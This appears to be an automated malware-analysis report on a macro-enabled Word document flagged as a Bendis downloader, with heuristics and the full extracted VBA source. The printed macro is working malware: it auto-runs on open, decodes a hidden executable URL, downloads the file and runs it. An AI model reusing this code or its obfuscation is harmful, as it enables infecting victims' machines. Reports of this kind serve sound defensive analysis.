MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing obfuscated VBA macros, including an auto-exec loader. Heuristics indicate the use of CreateObject and CallByName, common for executing downloaded payloads. ClamAV detection as 'Doc.Downloader.Bendis-6680540-0' further supports its malicious nature as a downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Bendis-6680540-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Bendis-6680540-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set fishkinet_1 = CreateObject(hubabuba(0)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fishkinet_1 = CreateObject(hubabuba(0)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15746 bytes |
SHA-256: a500579203bede3a60b85d9aecd59a611b7ca794b92dab151ba4c4d009513b49 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call CenterByMan
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{09086845-7A86-431E-ADD5-7DC6B76003CD}{07762A1E-E82C-4003-865A-EFD094B7EE4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public fishkinet_1 As Object
Public fishkinet_2 As Object
Public fishkinet_3 As Object
Public fishkinet_7() As String
Public fishkinet_4 As String
Public fishkinet_5 As String
Public fishkinet_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set fishkinet_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName fishkinet_2, hubabuba(9), VbMethod, rbp
CallByName fishkinet_2, hubabuba(11), VbMethod, fishkinet_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
fishkinet_6.Open (fishkinet_5)
End Sub
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
fishkinet_5 = fishkinet_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
fishkinet_5 = fishkinet_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName fishkinet_2, hubabuba(7), VbLet, 1
fishkinet_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
fishkinet_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
fishkinet_4 = fishkinet_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim fishkinet_8 As Integer
Dim fishkinet3_1 As String
fishkinet3_1 = ""
GoTo s2
s2:
For fishkinet_8 = LBound(fishkinet_7) To UBound(fishkinet_7)
fishkinet3_1 = fishkinet3_1 & Chr(CInt(fishkinet_7(fishkinet_8)) - 1000)
Next fishkinet_8
GoTo SIDR4
SIDR4:
fishkinet_1.Open hubabuba(5), fishkinet3_1, False
KeepBlyading
End Function
'''''''''''''''''''
'@param operation is the string to be converted, placeholder is {*} by default
'
'''''''''''''''''''
Public Function productX(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, tmp))
Next k
Else
For Each k In pDict.Keys
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, pDict(k) & ""))
Next k
End If
Set productX = res
End Function
Public Function clone() As Variant
Dim res As Variant
Set res = clone__(Me, pLevel)
With res
.appendMode = pIsDictFilled
.reversedMode = pReversedMode
If pStrictMode Then
.strictMode = True
.strictModeReg = pStrictModeReg
End If
End With
Set clone = res
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
fishkinet_7 = Split("1104|1116|1116|1112|1058|1047|1047|1100|1101|1115|1105|1103|1110|1105|1115|1046|1099|1111|1109|1046|1117|1097|1047|1097|1100|1109|1105|1110|1047|1105|1109|1097|1103|1101|1115|1047|1056|1055|1104|1055|1053|1052|1046|1101|1120|1101", _
"|")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set fishkinet_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set fishkinet_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set fishkinet_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module4"
Public Function IsReg(testObj As Object) As Boolean
On Error GoTo errhandler3
Dim a As Boolean
a = testObj.test("")
errhandler3:
If Err.Number = 0 Then
IsReg = True
Else
IsReg = False
End If
End Function
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
' ________________________________________Util Functions____________________________________________
Public Function reg(ByVal pattern As String, Optional ByVal flag As String) As Object
Dim obj As Object
Set obj = CreateObject("vbscript.regexp")
obj.pattern = pattern
If IsMissing(flag) Then
obj.IgnoreCase = True
Else
' "gi"
If InStr(StrConv(flag, vbLowerCase), "g") > 0 Then
obj.Global = True
End If
' i by default to true
If InStr(StrConv(flag, vbLowerCase), "i") > 0 Then
obj.IgnoreCase = False
End If
End If
Set reg = obj
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 62976 bytes |
SHA-256: 6a6e4cd5b419097b51e9b17b6911d37345a5d3ec7682f7f6c334fc7dc80594c8 |
|||
|
Detection
ClamAV:
Doc.Downloader.Bendis-6680540-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.